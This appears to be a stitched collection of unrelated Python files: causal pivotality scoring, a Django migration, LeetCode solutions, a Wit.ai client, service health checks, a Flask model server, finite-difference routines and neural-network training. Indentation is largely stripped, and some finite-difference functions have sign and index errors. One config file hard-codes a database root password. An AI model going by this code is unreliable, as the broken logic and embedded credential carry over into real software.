# exogenous = filter(lambda a: copy.predecessors(a) == [] and nx.has_path(copy, a, effect), copy.nodes())
# else:
# exogenous = filter(lambda a: nx.has_path(copy, a, effect), copy.nodes())
# print copy.path(cause, effect)
# for suc in copy.path(cause, effect):
# if suc in exogenous:
# print 'suc', suc
# exogenous.remove(suc)
# if effect in exogenous:
# exogenous.remove(effect)
# if cause in exogenous:
# exogenous.remove(cause)
# if pivotal(hierarchy, cause, effect, attr=attr):
# return 1
# # find values to compare to
# actual_values = map(hierarchy.value, exogenous)
# # pair values with their nodes
# actual_values = zip(exogenous, actual_values)
# def distance(values):
# distance = 0
# values = zip(exogenous, values)
# print 'actual', actual_values
# print 'values', values
# for a, b in zip(values, actual_values):
# if a != b:
# distance += 1
# print distance
# return distance
# closest_distance = len(exogenous) + 1
# closest_hierarchy = None
# for values in product(*[(0, 1) for v in xrange(len(exogenous))]):
# copy.clear_values()
# for node, value in zip(exogenous, values):
# copy.node[node]['value'] = value
# print
# print
# if attr.has_key('e_value'):
# print 'here'
# piv = pivotal(hierarchy, cause, effect, e_value=attr.get('e_value'), values=zip(exogenous, values))
# else:
# piv = pivotal(hierarchy, cause, effect, values=zip(exogenous, values))
# print closest_distance
# if distance(values) < closest_distance and piv:
# closest_distance = distance(values)
# print 'changed closeest_distance to', closest_distance
# closest_hierarchy = values
# return Fraction(1, closest_distance + 1) if closest_hierarchy != None else 0
'''
NEW
'''
def pivotality(hierarchy, cause, effect, **attr):
copy = hierarchy.copy()
if pivotal(hierarchy, cause, effect):
return 1
exogenous = copy.nodes()
if 'root' in attr:
exogenous = filter(lambda a: copy.predecessors(a) == [], exogenous)
if cause in exogenous:
exogenous.remove(cause)
if effect in exogenous:
exogenous.remove(effect)
for i in xrange(len(exogenous)+1):
for combo in combinations(exogenous, i):
sub = hierarchy.copy()
# print 'combo', combo
for c in combo:
sub.remove_edges_from([(e, c) for e in copy.predecessors(c)])
if attr.has_key('e_value'):
piv = pivotal(sub, cause, effect, combo=combo, e_value=attr.get('e_value'))
else:
piv = pivotal(sub, cause, effect, combo=combo)
if piv:
return Fraction(1, i + 1)
return 0
def pivotal(hierarchy, cause, effect, **attr):
if 'combo' in attr:
copy = hierarchy.copy()
for c in attr['combo']:
copy.node[c]['value'] = int(not copy.node[c]['value'])
else:
copy = hierarchy.copy()
copy.clear_values()
if attr.has_key('values'):
copy.assign_values(attr['values'])
# set initial outcome
outcome = copy.evaluate(effect)
# copy.print_situation()
if attr.has_key('e_value'):
if outcome != attr['e_value']:
return False
copy.node[cause]['value'] = int(not hierarchy.node[cause]['value'])
new = copy.evaluate(effect)
if outcome != new:
return True
else:
return False
'''
find the probability that a node will be pivotal through sampling
parameters:
Hierarchy hierarchy
str node
str effect
int samples
return:
float criticality calculated through sampling
'''
def prob_pivotal(hierarchy, node, effect, samples=100, **attr):
count = 0
total = 0
for sample in xrange(samples):
# create a deepcopy of the hierarchy
copy = hierarchy.copy()
# sample root nodes to create a new situation
if 'priors' in hierarchy.graph:
copy.sample_values()
else:
for i in filter(lambda a: a[0] == str(0), hierarchy.nodes()):
copy.sample_value(i, copy.node[i].get('prior'))
# evaluate the effect that occured in the situation
copy.evaluate(effect)
# if we are considering only cases specified by e_value
if attr.has_key('e_value'):
# if the effect in this situation matches e_value increase total
if copy.value(effect) == attr['e_value']:
total += 1
# if the node was pivotal for the account increase count
                if pivotal(copy, node, effect, e_value=attr['e_value']):
count += 1
else:
            if pivotal(copy, node, effect):
count += 1
# if total is still zero, we are evaluvating prob_pivotal for all cases
# set total to the sample size
if total == 0:
total = samples
return float(count)/total
'''
P(cause=pivotal, effect=e_value)/P(effect=e_value) = P(cause=pivotal | effect=e_value)
parameters:
Hierarchy hierarchy
str cause
str effect
dict attr / e_value(target effect value)
return:
float criticality
'''
def criticality(hierarchy, cause, effect, **attr):
copy = hierarchy.copy()
exogenous = filter(lambda a: copy.predecessors(a) == [], copy.nodes())
count = 0
total = 0
for settings in list(product(*[(0, 1) for v in xrange(len(exogenous))])):
values = list(zip(exogenous, settings))
copy.clear_values()
copy.assign_values(values)
outcome = copy.evaluate(effect)
copy.clear_values()
if attr.has_key('e_value'):
if outcome == attr['e_value']:
total += 1
if pivotal(copy, cause, effect, e_value=attr['e_value']):
count += 1
else:
total = len(list(product(*[(0, 1) for v in xrange(len(exogenous))])))
if pivotal(copy, cause, effect):
count += 1
return float(count)/total
def unpacked_pivotality(hierarchy, cause, effect, **attr):
path = hierarchy.path(cause, effect)
if path != []:
piv = []
for node in path:
if node != effect:
if 'e_value' in attr:
p = pivotality(hierarchy, node, effect, e_value=attr['e_value'])
else:
p = pivotality(hierarchy, node, effect)
piv.append(p)
return sum(piv)/float(len(piv))
else:
return 'cannot be unpacked'
|
# Generated by Django 2.2.7 on 2019-12-12 08:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('web', '0004_auto_20191212_0831'),
]
operations = [
migrations.AlterUniqueTogether(
name='document',
unique_together={('source', 'embedding_type')},
),
]
|
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine
__author__ = 'Haoran'
mysql_db = create_engine('mysql+pymysql://root:growth@192.168.20.96:3306/sem?charset=utf8', echo=False)
user_agent = """Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6)
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/53.0.2785.116 Safari/537.36"""
headers = {'User-Agent': user_agent}
|
def fib(max):
n,a,b = 0,0,1
while n < max:
print(b)
a,b = b,a+b
n += 1
return 'lalalalal'
fib(6)
|
from wit import Wit
import wave
import pyaudio
import os
from array import array
import logging
class Witai:
def __init__(self):
self.client = Wit(access_token=os.environ.get('wit_token'))
def create_audio_file(self):
audio_format = pyaudio.paInt16
channels = 2
sample_rate = 44100
chunk = 1024
recording_seconds = 5
file_name = "resources/audio.wav"
audio = pyaudio.PyAudio() # instantiate the pyAudio
# recording prerequisites
stream = audio.open(format=audio_format, channels=channels,
rate=sample_rate,
input=True,
frames_per_buffer=chunk)
# starting recording
frames = []
for i in range(0, int(sample_rate / chunk * recording_seconds)):
data = stream.read(chunk)
data_chunk = array('h', data)
vol = max(data_chunk)
if vol >= 500:
frames.append(data)
# end of recording
stream.stop_stream()
stream.close()
audio.terminate()
# writing to file
wave_file = wave.open(file_name, 'wb')
wave_file.setnchannels(channels)
wave_file.setsampwidth(audio.get_sample_size(audio_format))
wave_file.setframerate(sample_rate)
wave_file.writeframes(b''.join(frames)) # append frames recorded to file
wave_file.close()
def create_message_request(self, text):
try:
resp = self.client.message(text)
print('Yay, got Wit.ai response: ' + str(resp))
except Exception:
self.client.logger.setLevel(logging.WARNING)
print('Something went wrong with the message request')
def create_speech_request(self):
self.create_audio_file()
try:
with open('resources/audio.wav', 'rb') as f:
res = self.client.speech(f, None, {'Content-Type': 'audio/wav'})
print('Yay, got Wit.ai response: ' + str(res))
except Exception:
self.client.logger.setLevel(logging.WARNING)
print("Something went wrong with the speech request")
|
import sys
import random
#define a function for printing a grid
def print_grid(input_grid):
print("||-------||");
for row in input_grid:
print(row);
print("||-------||");
#input parameters
M, N = 5, 7;
max_val = 5;
#use dicts as sets of row/column indices (average O(1) insertion and lookup); Python's built-in set would work just as well
row_hash_table = {};
col_hash_table = {};
#create a grid for testing purposes
grid = [ [random.randint(0, max_val) for col in range(N)] for row in range(M) ];
print_grid(grid);
#check the rows, cols that need to be set to zero (in O(MN))
for row in range(len(grid)):
for col in range(len(grid[0])):
if (not grid[row][col]):
row_hash_table[row] = True;
col_hash_table[col] = True;
#go through elements in the hash-tables, clear the rows and the columns in (in O(MN))
for row in row_hash_table:
grid[row] = [0] * len(grid[row]);
for col in col_hash_table:
for row in range(len(grid)):
grid[row][col] = 0;
#print the output
print_grid(grid);
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 12 19:15:08 2015
@author: LIght
"""
import numpy
class LFM:
@staticmethod
def matrix_factorization(R, P, Q, K, steps=1000, alpha=0.0002, beta=0.02):
Q = Q.T
for step in xrange(steps):
print step
for i in xrange(len(R)):
for j in xrange(len(R[i])):
if R[i][j] > 0:
eij = R[i][j] - numpy.dot(P[i,:],Q[:,j])
for k in xrange(K):
P[i][k] = P[i][k] + alpha * (2 * eij * Q[k][j] - beta * P[i][k])
Q[k][j] = Q[k][j] + alpha * (2 * eij * P[i][k] - beta * Q[k][j])
#eR = numpy.dot(P,Q)
e = 0
for i in xrange(len(R)):
for j in xrange(len(R[i])):
if R[i][j] > 0:
e = e + pow(R[i][j] - numpy.dot(P[i,:],Q[:,j]), 2)
for k in xrange(K):
e = e + (beta/2) * (pow(P[i][k],2) + pow(Q[k][j],2))
if e < 0.001:
break
return P, Q.T
'''
example code, too slow for movielens matrix, optimize
R = np.array(user_item_matrix)
N = len(R)
M = len(R[0])
K = 5
P = np.random.rand(N,K)
Q = np.random.rand(M,K)
nP, nQ = lfm.LFM.matrix_factorization(R, P, Q, K)
nR = np.dot(nP, nQ.T)
'''
|
# coding=utf-8
"""
statusdocke.py
Desc: query the version REST API to get each service's running status (_queryStatus()).
      checkRunner() -> _checkRunning() -> _isRunning(), _queryStatus()
Maintainer: wangfm
CreateDate: 2016/12/7
"""
import requests
import json
from logger import logger
from time import sleep
# logging.basicConfig(level=logging.ERROR)
# base data, Cautious modification
serviceInfos = [{
'serviceName': 'interact'
}, {
'serviceName': 'jycenter'
}, {
'serviceName': 'middlecenterfile'
}, {
'serviceName': 'middlecas'
}, {
'serviceName': 'middlecenterres'
}, {
'serviceName': 'middleclient'
}]
# {'serviceName': 'middleware-mcu'},
# test Data,del later
testflag = [{
'status': 'On',
u'dbversion': u'V1.10.11.R',
'serviceName': 'interact',
u'version': u'V1.02.002.B.044',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
u'dbversion': u'V1.10.18.R',
'serviceName': 'jycenter',
u'version': u'V1.01.001.B.008',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
u'dbversion': u'V1.10.15.R',
'serviceName': 'middlecenterfile',
u'version': u'V1.00.001.B.010',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
'serviceName': 'middlecas',
u'version': u'V1.02.002.B.007',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
u'dbversion': u'V1.10.18.R',
'serviceName': 'middlecenterres',
u'version': u'V1.01.001.B.008',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
'serviceName': 'middleclient',
u'version': u'V2.01.001.B.011',
'serviceIp': '10.1.0.56'
}]
def _queryStatus(*args):
"""
Function: _queryStatus()
Desc: request rest API get service information.
Args:
-
Return: dict-> service status
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
    urlhead, urlip, dockermodel, urltail = 'http://', args[0], args[1], '/version'
requesturl = ''.join([urlhead, urlip, '/', dockermodel, urltail])
logger.debug("Request URL is: {}".format(requesturl))
serviceStatusInit = {
'status': 'Off',
'serviceIp': args[0],
'serviceName': args[1]
}
try:
r = requests.get(requesturl)
# logger.debug(r)
if r.status_code == 200:
if not hasattr(r, 'text'):
logger.info("failed")
else:
try:
result = json.loads(r.text)
servicetatus = dict(serviceStatusInit)
servicetatus.update(result)
if servicetatus.has_key('version'):
servicetatus['status'] = 'On'
else:
servicetatus['status'] = 'NoSuch'
except ValueError:
servicetatus = dict(serviceStatusInit)
servicetatus['status'] = 'Off'
else:
servicetatus = dict(serviceStatusInit)
except requests.exceptions.ConnectionError:
servicetatus = dict(serviceStatusInit)
servicetatus['status'] = 'ConnectionError'
finally:
return servicetatus
# def checkisRunning():
# print isRunning(testflag)
def _isRunning(serviceStatus):
"""
Function: _isRunning()
    Desc: check whether every service is 'On'; as soon as a service is in an abnormal state, return False and stop checking.
Args: requests version API retruns dict(serviceStatus)
- dict
Return: False/None
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
for flagtmp in serviceStatus:
if flagtmp['status'] == 'On':
logger.info('{0}: {1}'.format(flagtmp['serviceName'], flagtmp['status']))
else:
logger.info('{0}: {1}'.format(flagtmp['serviceName'], flagtmp['status']))
return False
def _checkRunning(plathost):
"""
Function: _checkRunning()
    Desc: check whether all services are healthy; return True if so, otherwise retry up to 5 times.
Args:
-
Return: True/None
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
arrstatus = []
for serviceInfo in serviceInfos:
arrstatus.append(_queryStatus(plathost, serviceInfo['serviceName']))
for dotimes in range(5):
logger.info("###################Service Status###################")
if _isRunning(arrstatus) is not False:
logger.info("Service is Running..")
logger.info("####################################################")
return True
else:
logger.info('sleep 120s..')
sleep(120)
logger.info("####################################################")
def t_status(plathost):
"""
Function: _status()
    Desc: return a list of service statuses obtained via _queryStatus().
Args:
-
Return:
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
arrstatus = []
for serviceInfo in serviceInfos:
arrstatus.append(_queryStatus(plathost, serviceInfo['serviceName']))
return arrstatus
def checkRunner(plathost):
return _checkRunning(plathost)
if __name__ == "__main__":
# if isRunning(testflag) is False:
# print "no"
# else:
# print "yes"
# checkRunning()
# print checkRunning()
    print t_status('10.1.41.12')
|
from django.apps import AppConfig
class ProductdtConfig(AppConfig):
name = 'ProductDT'
verbose_name = '产品'
|
a = "abcdefghijklmnopqrstuwxyz"
n = 5
a = a[:n]
a = a[n-1::-1] #reversing
rev = n-1
count , i = 0 , 0
while i>=0:
count+=1
res = '-'.join(a[:i]+a[i::-1])
print(res.center((4*n)-3, '-'))
if(count >= (n)):
i-=1
else:
i+=1
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 23 17:51:34 2015
@author: HSH
"""
class Solution(object):
def rotate(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: void Do not return anything, modify matrix in-place instead.
"""
start = 0
end = len(matrix) - 1
while start < end:
for i in range(start, end):
offset = i - start
temp = matrix[start][i]
matrix[start][i] = matrix[end - offset][start]
matrix[end - offset][start] = matrix[end][end - offset]
matrix[end][end - offset] = matrix[start + offset][end]
matrix[start + offset][end] = temp
start += 1
end -= 1
return
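# Usage sketch: rotate a 3x3 matrix 90 degrees clockwise in place.
if __name__ == "__main__":
    m = [[1, 2, 3],
         [4, 5, 6],
         [7, 8, 9]]
    Solution().rotate(m)
    print(m)  # [[7, 4, 1], [8, 5, 2], [9, 6, 3]]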
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
import re
with open("test2.txt","r",encoding="utf-8") as f:
s11 = f.read()
# print(s11)
s1=s11.strip()
s2 = s1.replace(">","")
s3 = s2.replace("<","")
s4 = s2.replace("=","")
s5 = s4.replace("=","")
s6 = re.sub('[<>?;($#&":\-\'.//!}{)_]+','',s5)
s7=s6.replace('<>< ="-:','')
print(s7)
file = open('test3.txt', 'wb')
file.write(str(s7).encode("utf-8"))
file.close()
|
# see http://blog.luisrei.com/articles/flaskrest.html
# curl -H "Content-type: application/json" -X POST http://127.0.0.1:5000/submit -d @test_data.json
from flask import Flask, request, json
import numpy as np
import tensorflow as tf
import os, sys, random, csv, math
from model import create_network
from utils import read_labels
num_results = 3
mean_path = 'mean.npy'
std_path = 'std.npy'
metainfo_path = 'wifiscan_metainfo.csv'
labels_csv = 'wifiscan_labels.csv'
network_name = 'wifi_model_log-1-79100'
load_model_from = 'Model/80/' + network_name
u = read_labels(labels_csv)
name_to_vector = u['name_by_vector']
vector_to_name = u['vector_by_name']
classes = u['names']
mean = np.load(mean_path)
std = np.load(std_path)
n_classes = len(classes)
n_features = mean.shape[0]
mac_order = []
with open(metainfo_path, 'rt') as f:
reader = csv.reader(f, delimiter=';')
for row in reader:
mac_order.append(row[1])
default_level = math.log10(100+1)
app = Flask(__name__)
history = []
if __name__ == '__main__':
g = tf.Graph()
with g.as_default():
with tf.Session(graph = g) as sess:
X, Y_pred = create_network(n_features, n_classes, is_training=False)
init = tf.global_variables_initializer()
sess.run(init)
saver = tf.train.Saver()
print("Loading model from", load_model_from)
saver.restore(sess, load_model_from)
@app.route('/')
def index():
return "Hello, World! POST a JSON map of MAC->abs(signal) to /submit"
@app.route('/submit', methods = ['POST'])
def submit():
if request.headers['Content-Type'] == 'application/json':
empty_vector = np.asarray( [default_level]*n_features, dtype=np.float )
for mac, signal in request.json.items():
if mac not in mac_order:
continue
index = mac_order.index(mac)
empty_vector[index] = math.log10(1+signal)
x = (empty_vector - mean)/(std + 1e-10)
x = np.expand_dims(x, axis=0)
pred = sess.run([Y_pred], feed_dict={X: x})[0][0]
print("pred=", pred)
topIndices = pred.argsort()[-num_results:][::-1].tolist()
#print( classes )
#print( [i for i in topIndices] )
#print( [classes[i] for i in topIndices] )
#print( [pred[i] for i in topIndices] )
resp = [ [classes[i] , pred[i]] for i in topIndices]
#print(str(resp))
top = topIndices[0]
history.append(top)
if len(history) > 10:
h = history[-10:]
f = {}
for n in h:
if not n in f:
f[n] = 0
f[n]+=1
mx = 0
top = 0
for i, c in f.items():
if c > mx:
mx = c
top = i
print(classes[top] + ": " + str(pred[top]))
#if pred[top] <= 0.5:
# return "not sure..."
return "" + classes[top] + ":" + str(pred[top])
#return "{'result':" + str(resp) + "}"
return "{'err': '415 Unsupported Media Type ;)'}"
app.run(debug=True, host="0.0.0.0")
|
from .pages.main_page import MainPage
from .pages.product_page import ProductPage
def test_guest_should_see_login_link(browser):
#link = "http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear"
link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=newYear2019"
page = MainPage(browser, link)
page.open()
product_page = ProductPage(browser, browser.current_url)
product_page.add_good_to_basket()
product_page.solve_quiz_and_get_code()
product_page.check_good()
|
import support_lib as bnw
import time
# 2016/08/31 - Original version
# This routine attempts to add a player to the specified game
def createPlayer(playerEmail, playerName, shipName, gameURL):
debug = True
# xpaths
xEmailAddress = 'html/body/form/dl/dd[1]/input'
xShipName = 'html/body/form/dl/dd[2]/input'
xPlayerName = 'html/body/form/dl/dd[3]/input'
xPageBanner = 'html/body/h1'
xSubmitButton = 'html/body/form/div/input[1]'
if debug:
print("Attempting to load the new player entry page")
newPlayerPage = 'http://{}/new.php'.format(gameURL)
bnw.loadPage(newPlayerPage)
bannerText = bnw.textFromElement(xPageBanner)
if not bannerText == 'Create New Player':
if debug:
print('Unable to load the create new player page - bad URL?')
return ['ERROR', 'Bad URL']
if not bnw.fillTextBox(xEmailAddress, playerEmail):
if debug:
print('Unable to fill in the new player email address')
return ['ERROR', 'E-Mail XPath Error']
if not bnw.fillTextBox(xShipName, shipName):
if debug:
print('Unable to fill in the new player ship name')
return ['ERROR', 'Ship Name XPath Error']
if not bnw.fillTextBox(xPlayerName, playerName):
if debug:
print('Unable to fill in the new player name')
return ['ERROR', 'Player Name XPath Error']
if not bnw.clickButton(xSubmitButton):
if debug:
print('Unable to click the new player submit button')
return ['ERROR', 'Submit Button Error']
time.sleep(3)
bannerText = bnw.textFromElement(xPageBanner)
if not bannerText == 'Create New Player Phase Two':
if debug:
print('Error entering new player info?')
return ['ERROR', 'Bad Player Info']
print('Password must have been sent...')
|
# 1. Read two integers a and b. Print the integers strictly between a and b on a single line.
#---------------------
a = int(input("Enter integer a: "))
b = int(input("Enter integer b: "))
for i in range(min(a, b) + 1, max(a, b)):
    print(i, end=' ')
#-----------------------
|
class Solution:
def rob(self, nums: List[int]) -> int:
l = len(nums)
dp = [0]*l
if l == 0:
return 0
if l < 3:
return max(nums)
dp[0] = nums[0]
dp[1] = nums[1]
dp[2] = nums[0]+nums[2]
for i in range(3,l):
dp[i] = nums[i]+max(dp[i-2],dp[i-3])
# print(dp)
return max(dp[-1],dp[-2])
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:
sorted_box_types, result = (
sorted(boxTypes, key=lambda el: el[1], reverse=True),
0,
)
for number_of_boxes, number_of_units_per_box in sorted_box_types:
number_of_boxes_taken = min(number_of_boxes, truckSize)
result += number_of_boxes_taken * number_of_units_per_box
truckSize -= number_of_boxes_taken
if not truckSize:
break
return result
if __name__ == "__main__":
solution = Solution()
assert 8 == solution.maximumUnits([[1, 3], [2, 2], [3, 1]], 4)
assert 91 == solution.maximumUnits([[5, 10], [2, 5], [4, 7], [3, 9]], 10)
|
# Closures
# A closure preserves the scope and state of the enclosing function's variables at the time it is returned
# A closure needs an inner function
# The inner function must reference variables of the enclosing function
# The enclosing function returns the inner function
def func(a, b):
c = 10
def inner_func():
s = a + b + c
print("相加之和的结果是:", s)
return inner_func
ifunc = func(2, 3)
ifun1 = func(2, 8)
ifunc()
def funv():
c = 1
def funb():
print("时间")
def funN():
funb()
print("funN")
return funN
ifun2 = funv()
ifun2()
# counter
def generate_count():
counter = [0]
def add_one():
        # no 'nonlocal counter' declaration needed here: counter is a list, and lists are mutable
        counter[0] += 1
        print("This is call number {}".format(counter[0]))
return add_one
counter = generate_count()
counter()
counter()
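# For contrast, a minimal sketch of the same counter built on an int instead of a list:
# an immutable int cannot be rebound from the inner function without 'nonlocal'.
def generate_count_nonlocal():
    counter = 0
    def add_one():
        nonlocal counter  # required, because assignment rebinds the name
        counter += 1
        print("This is call number {}".format(counter))
    return add_one

counter2 = generate_count_nonlocal()
counter2()
counter2()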
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 11 23:32:56 2020
@author: shaun
"""
import numpy as np
def firstorder(f1,f2,h):
answer=(f1-f2)/h
return answer
def firstorderwhole(listx,listy,h):
L=len(listy)
y=[]
x=[]
for i in range(0,L-1):
y.append(firstorder(listy[i],listy[i+1],h))
x.append(listx[i])
return [x,y]
def secondorder(f1,f3,h):
y=[]
x=[]
answer=(f3-f1)/(2*h)
return answer
def secondorderwhole(listx,listy):
L=len(listy)
y=[]
x=[]
for i in range(1,L-1):
h=abs(listx[i]-listx[i-1])
y.append(secondorder(listy[i-1],listy[i],h))
x.append(listx[i])
x=np.array(x)
y=np.array(y)
return x,y
def fourthorder(f1,f2,f3,f4,h):
    # fourth-order central difference: (f1 - 8*f2 + 8*f3 - f4) / (12*h)
    f = (f1 - 8*f2 + 8*f3 - f4) / (12*h)
return f
def fourthorderwhole(listx,listy,h):
y=[]
x=[]
L=len(listy)
for i in range(3,L-2,3):
y.append(fourthorder(listy[i-2],listy[i-1],listy[i+1],listy[i+2],h))
x.append(listx[i])
return x,y
def fourthorders(f1,f2,f3,f4,h):
A=np.matrix([[1,1,1,1],[0,1,2,3],[0,0.5,2,9/2],[0,1/6,8/6,27/6]],float)
B=np.matrix([[0],[-1/h],[0],[0]],float)
A_inverse= np.linalg.inv(A)
a=A_inverse*B
answer=a[0]*f1+a[1]*f2+a[2]*f3+a[3]*f4
return answer
def tridiag(a, b, c, k1=-1, k2=0, k3=1):
return np.diag(a, k1) + np.diag(b, k2) + np.diag(c, k3)
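# Quick sketch of what tridiag builds: the sub-diagonal, main diagonal and
# super-diagonal bands are stacked into one matrix (the off-diagonal bands are
# one element shorter than the main diagonal).
example_T = tridiag([1, 1], [4, 4, 4], [1, 1])
# [[4 1 0]
#  [1 4 1]
#  [0 1 4]]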
#pade scheme
def pade(a,b,c,d,l,F):
A=[]
B=[]
C=[]
D=[]
B.append(b[0])
C.append(c[0])
print("this is l length:"+ str(l))
for k in range(0,l-2):
A.append(a[1])
B.append(b[1])
C.append(c[1])
B.append(b[2])
A.append(a[2])
D.append(d[0][0]*F[0]+d[0][1]*F[1]+d[0][2]*F[2])
print("this is F length:"+str(len(F)))
for k in range(0,len(F)-2):
D.append(d[1][0]*(F[k+2]-F[k]))
D.append(d[2][0]*F[-3]+d[2][1]*F[-2]+d[2][2]*F[-1])
T = tridiag(A, B, C)
print(T)
alpha=[B[0]]
beta=[]
victor=[D[0]]
N=len(A)
f=[]
for k in range(0,N):
beta.append((A[k]/alpha[k]))
alpha.append(B[k+1]-C[k]*beta[k])
for k in range(0,N):
victor.append(D[k+1]-beta[k]*victor[-1])
f.append(victor[-1]/alpha[-1])
for k in range(N-1,-1,-1):
f.append((victor[k]-C[k]*f[-1])/alpha[k])
f.reverse()
return f
#use this if you do not have a triangular structure
def badpade(a,b,c,d,l,F):
A=[]
B=[]
C=[]
D=[]
B.append(b[0])
C.append(c[0])
for k in range(0,l-2):
A.append(a[1])
B.append(b[1])
C.append(c[1])
B.append(b[2])
A.append(a[2])
D.append([d[1][0]*(F[1]-F[l-1])])
for k in range(0,len(F)-2):
D.append([d[1][0]*(F[k+2]-F[k])])
D.append([d[1][0]*(F[0]-F[l-1])])
T = tridiag(A, B, C)
T[0,2]=c[2]
T[-1,-3]=a[0]
D=np.array(D)
IT=np.linalg.inv(T)*(D.transpose())
f=np.matmul(IT,D)
return f
d=np.array([[1,2,3],[3,0,0],[7,8,9]], int)
ans=badpade([-5,1,2],[1,4,1],[2,1,82],d,5,[1,1,1,1,1])
#print(pade([0,1,2],[1,4,1],[2,1,0],d,5,[1,1,1,1,1]))
print(ans)
|
import unittest
from katas.kyu_8.bug_fixing_6 import eval_object
class EvalObjectTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '+'}), 2)
def test_equals_2(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '-'}), 0)
def test_equals_3(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '/'}), 1)
def test_equals_4(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '*'}), 1)
def test_equals_5(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '%'}), 0)
def test_equals_6(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '**'}), 1)
|
"""
Fuzzy matching of strings/names.
"""
import csv
from collections import defaultdict, Counter
def group_by(kv_pairs):
"""Group key-value pairs by key"""
groups = defaultdict(list)
for k, v in kv_pairs:
groups[k].append(v)
return groups
def ngrams(text, n=3):
"""Return list of text n-grams of size n"""
return {text[i:i + n].lower() for i in range(len(text) - n + 1)}
def find(query, index):
"""Find best match of query string in n-gram index"""
sgrams = ngrams(query)
matches = Counter(sid for ngram in sgrams for sid in index.get(ngram, []))
return matches.most_common(1)
def create_index(filepath):
"""Create n-gram index that maps n-grams to subject ids"""
sid2name = load_sid2name(filepath)
return group_by((ngram, sid) for sid, name in sid2name for ngram in ngrams(name))
def load_sid2name(filepath):
"""Load file that maps subject ids to names"""
with open(filepath) as csvfile:
reader = csv.reader(csvfile)
next(reader) # skip header
for sid, name in reader:
yield sid.strip(), name.replace(',', ' ')
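# A minimal in-memory sketch of the same idea, without the CSV file:
# build an n-gram index over two names and look one of them up.
def _demo_index():
    records = [('1', 'Alice Johnson'), ('2', 'Bob Smith')]
    index = group_by((ngram, sid) for sid, name in records for ngram in ngrams(name))
    return find('Jonson Alice', index)  # -> [('1', <shared n-gram count>)]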
# Example main
if __name__ == '__main__':
print('running')
index = create_index('../data/index.csv')
while 1:
query = input('search: ')
if query == 'q': break
match = find(query, index)
print(match[0] if match else 'NO MATCH')
print('-' * 50)
|
class Vetor:
def __init__(self, lista):
self.lista = lista
self.ordenado = False
    def __str__(self):
        return str(self.lista)
|
import math
import os
import numpy as np
import tensorflow as tf
from tqdm import tqdm
from Inception import inception
import hyperparams as hp
BUFFER_SIZE = 100
x_train = []
y_train = []
categories = os.listdir(path='Images')[:10]
print(len(categories))
num_categories = len(categories)
for idx, category in enumerate(categories):
files = os.listdir(path='Images/' + category)
for file in files:
img = tf.keras.preprocessing.image.load_img('Images/%s/%s' % (category, file), target_size=(hp.ss, hp.ss))
img = tf.keras.preprocessing.image.img_to_array(img)
img /= 255
x_train.append(img)
y_train.append(idx)
x_train = np.array(x_train, dtype=np.float32)
print(y_train)
y_train = tf.keras.utils.to_categorical(np.array(y_train))
print(x_train.shape)
print(y_train)
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train)).shuffle(BUFFER_SIZE).batch(hp.batch_size)
print(train_dataset)
model = inception(num_categories)
tf.keras.utils.plot_model(model, show_shapes=True)
optimizer = tf.keras.optimizers.Adam(1e-4)
checkpoint_prefix = os.path.join(hp.checkpoint_dir, "ckpt")
checkpoint = tf.train.Checkpoint(model=model,
optimizer=optimizer)
if os.path.exists(hp.checkpoint_dir):
checkpoint.restore(tf.train.latest_checkpoint(hp.checkpoint_dir))
# print(model.summary())
loss_object = tf.keras.losses.CategoricalCrossentropy()
print('Prediction: ', np.argmax(model.predict(x_train[0].reshape(1, 299, 299, 3))))
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.CategoricalAccuracy(name='train_accuracy')
@tf.function
def train_step(imgs, lbls):
with tf.GradientTape() as tape:
predictions = model(imgs, training=True)
loss = loss_object(lbls, predictions)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train_loss(loss)
train_accuracy(lbls, predictions)
def train():
def ceil(val):
return math.ceil(val * 100) / 100
for epoch in range(hp.epochs):
train_loss.reset_states()
train_accuracy.reset_states()
for images, labels in tqdm(train_dataset, total=len(list(train_dataset))):
train_step(images, labels)
if (epoch + 1) % 1 == 0:
checkpoint.save(file_prefix=checkpoint_prefix)
template = 'Epoch {}, Loss: {}, Accuracy: {}'
print(template.format(epoch + 1,
ceil(train_loss.result()),
ceil(train_accuracy.result() * 100)))
train()
|
import torch
from torch.autograd import Variable
from torch import nn, optim
class SimpleCNN(nn.Module) :
def __init__(self) :
# b, 3, 32, 32
super().__init__()
layer1 = nn.Sequential()
layer1.add_module('conv_1', nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1))
# b, 32, 32, 32
layer1.add_module('relu_1', nn.ReLU(True))
layer1.add_module('pool_1', nn.MaxPool2d(2, 2)) # b, 32, 16, 16
self.layer1 = layer1
layer2 = nn.Sequential()
